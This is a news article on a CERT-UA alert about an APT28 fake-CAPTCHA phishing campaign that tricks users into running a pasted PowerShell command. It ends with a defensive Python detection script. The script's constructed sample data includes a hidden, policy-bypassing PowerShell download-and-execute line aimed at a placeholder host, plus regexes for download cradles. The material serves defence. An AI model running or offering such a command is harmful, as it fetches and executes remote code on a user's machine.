New Google cyberattack warning as Russian APT28 hackers strike

Ukraine’s Cyber Emergency Response Team has issued a new security warning after discovering a cyber attack campaign carried out by the APT28 threat group, also known as Fancy Bear. This group is believed, with a high degree of confidence, to be linked to Russian military intelligence operations. Here’s what we know so far and what to watch out for if you think you might be at risk of being targeted.

APT28 Fancy Bear Cyber Attack Campaign Alert from CERT-UA

The Ukrainian CERT alert, numbered CERT-UA#11689, was published on October 25 and, courtesy of Google’s site language translation tools, detailed an ongoing investigation into a phishing campaign using emails containing a table of data and a link that leads to what appears to be a Google reCAPTCHA bot-detection dialog.


How often most users encounter these CAPTCHA anti-bot prompts has decreased significantly, in no small part due to the large number of browser extensions that help defeat them and the likes of iOS using Apple’s server-based automatic verification system, which removes the need to fill them in yourself. However, it’s still not a completely unexpected event when one appears and, something that the Fancy Bear threat group is counting on, certainly not something that would raise suspicions in the user. If anything, it’s the opposite: the presence of such anti-bot protection tends to suggest a trustworthy site rather than a dangerous one.

In the case of this cyberattack campaign, CERT-UA said that ticking the checkbox in response to the “I’m not a robot” prompt copies a malicious PowerShell command to the user’s clipboard.

Mitigating the risk of falling victim to the CAPTCHA cyber attack

OK, so the most important point to make here is that the cyber attack campaign in question appears to be narrowly targeted at local government employees in Ukraine. This immediately filters out a lot of the concerns that everyone else might have. More importantly, though, that doesn’t mean the same techniques won’t be used by other threat actors now that the methodology is out there and apparently fooling some victims. Therefore, you should still be aware of the threat and how to mitigate it.


This brings me to the second important point here: the cyberattack is initiated by clicking a link (don’t do this) that causes the “I’m not a robot” dialog to appear first. If you get to this stage of such an attack, then more interaction is still required to execute the campaign payload: the PowerShell command copied to the clipboard does nothing on its own, and the page instructs the user to take a series of further steps to run it.

These include: pressing a Win+R combination to open the command prompt, pressing a Win+V combination to paste the command to run the malware payload, and finally having to press Enter to run it and install the malware itself. That is a lot of steps, and they require a lot of trust from the user. Don’t be so trusting. Period. Ask yourself, when have I ever been asked to do something like this before? I’ll bet my house that the answer to that, for 99.9% of people is, erm, never. So why start now? With cyberattack campaigns, especially those involving AI-augmented phishing techniques, it’s easy to forget that most still rely on good old-fashioned trickery. Stay alert, don’t let work pressures or knee-jerk reactions make you take unnecessary risks, and you can also keep state-sponsored hackers at bay.
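For defenders, the user-driven chain described above leaves a recognisable footprint: a command typed into the Run dialog is launched by explorer.exe and is recorded under the user’s RunMRU registry key, and a payload that has to run silently from that dialog tends to ask for a hidden window, a bypassed execution policy, an encoded command or a download cradle. The script below is an added example written for this article, not code from CERT-UA or from the alert; the Sysmon-style event lines and the RunMRU export are constructed sample data, the field layout and the signal regexes are assumptions, and the hostname and URL are placeholders.

```python
"""Spot the fake-CAPTCHA "Win+R, paste, Enter" chain in constructed telemetry.

Added example for illustration only (not from the CERT-UA alert). Two sources
are checked: process-creation events (PowerShell spawned by explorer.exe, which
is what a Run-dialog launch looks like) and RunMRU registry values, which
Windows writes for every command entered into the Run dialog.
"""
import re
from dataclasses import dataclass, field

# Constructed Sysmon-style process-creation records; pipe-separated key=value
# fields are an assumption for this example, not a real log format.
SAMPLE_EVENTS = [
    "EventID=1|ParentImage=C:\\Windows\\explorer.exe"
    "|Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
    "|CommandLine=powershell -w hidden -ep bypass -c \"iex (iwr http://example.invalid/x)\"",
    "EventID=1|ParentImage=C:\\Windows\\explorer.exe"
    "|Image=C:\\Windows\\System32\\notepad.exe|CommandLine=notepad.exe report.txt",
    "EventID=1|ParentImage=C:\\Program Files\\PowerShell\\7\\pwsh.exe"
    "|Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
    "|CommandLine=powershell -File build.ps1",
    "EventID=1|ParentImage=C:\\Windows\\explorer.exe"
    "|Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
    "|CommandLine=powershell -NoProfile -Command Get-Date",
]

# Constructed export of HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU.
# Real values carry a trailing "\1" and MRUList orders them, newest first.
SAMPLE_RUNMRU = {
    "MRUList": "ba",
    "a": "notepad\\1",
    "b": "powershell -w hidden -ep bypass -c \"iex (iwr http://example.invalid/x)\"\\1",
}

SHELL_PARENTS = ("explorer.exe",)
PS_IMAGES = ("powershell.exe", "pwsh.exe")

# Each regex is a weak signal on its own; an explorer.exe parent plus any of
# them is what makes the combination worth an alert.
CMD_SIGNALS = {
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "policy_bypass": re.compile(r"-e(?:xecutionpolicy|p)\s+bypass", re.I),
    "encoded_cmd": re.compile(r"-e(?:c|nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I),
    "download_cradle": re.compile(
        r"\b(iex|invoke-expression|iwr|invoke-webrequest|downloadstring|net\.webclient)\b", re.I),
}


@dataclass
class Finding:
    source: str            # "process" or "runmru"
    command: str
    signals: list = field(default_factory=list)


def parse_event(line):
    """Turn one constructed 'k=v|k=v' record into a dict."""
    return dict(part.split("=", 1) for part in line.split("|"))


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def score_command(cmd):
    """Names of the CMD_SIGNALS that match, in declaration order."""
    return [name for name, rx in CMD_SIGNALS.items() if rx.search(cmd)]


def flag_process_events(lines):
    """PowerShell launched by explorer.exe with a suspicious command line."""
    findings = []
    for line in lines:
        ev = parse_event(line)
        if ev.get("EventID") != "1":
            continue
        if basename(ev.get("ParentImage", "")) not in SHELL_PARENTS:
            continue
        if basename(ev.get("Image", "")) not in PS_IMAGES:
            continue
        signals = score_command(ev.get("CommandLine", ""))
        if signals:
            findings.append(Finding("process", ev["CommandLine"], signals))
    return findings


def flag_runmru(values):
    """Run-dialog history entries that launched a suspicious PowerShell command."""
    findings = []
    for key in values.get("MRUList", ""):
        raw = values.get(key, "")
        cmd = raw[:-2] if raw.endswith("\\1") else raw
        if not re.match(r"\s*(powershell|pwsh)\b", cmd, re.I):
            continue
        signals = score_command(cmd)
        if signals:
            findings.append(Finding("runmru", cmd, signals))
    return findings


if __name__ == "__main__":
    for f in flag_process_events(SAMPLE_EVENTS) + flag_runmru(SAMPLE_RUNMRU):
        print(f"[{f.source}] {', '.join(f.signals)} :: {f.command}")
```

Note that a user who starts PowerShell from the Start menu also gets an explorer.exe parent, so the parent check alone is noisy; it is the command-line signals that separate the Run-dialog payload from routine use, and the fourth sample event (a plain `Get-Date`) is deliberately left unflagged to show that.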
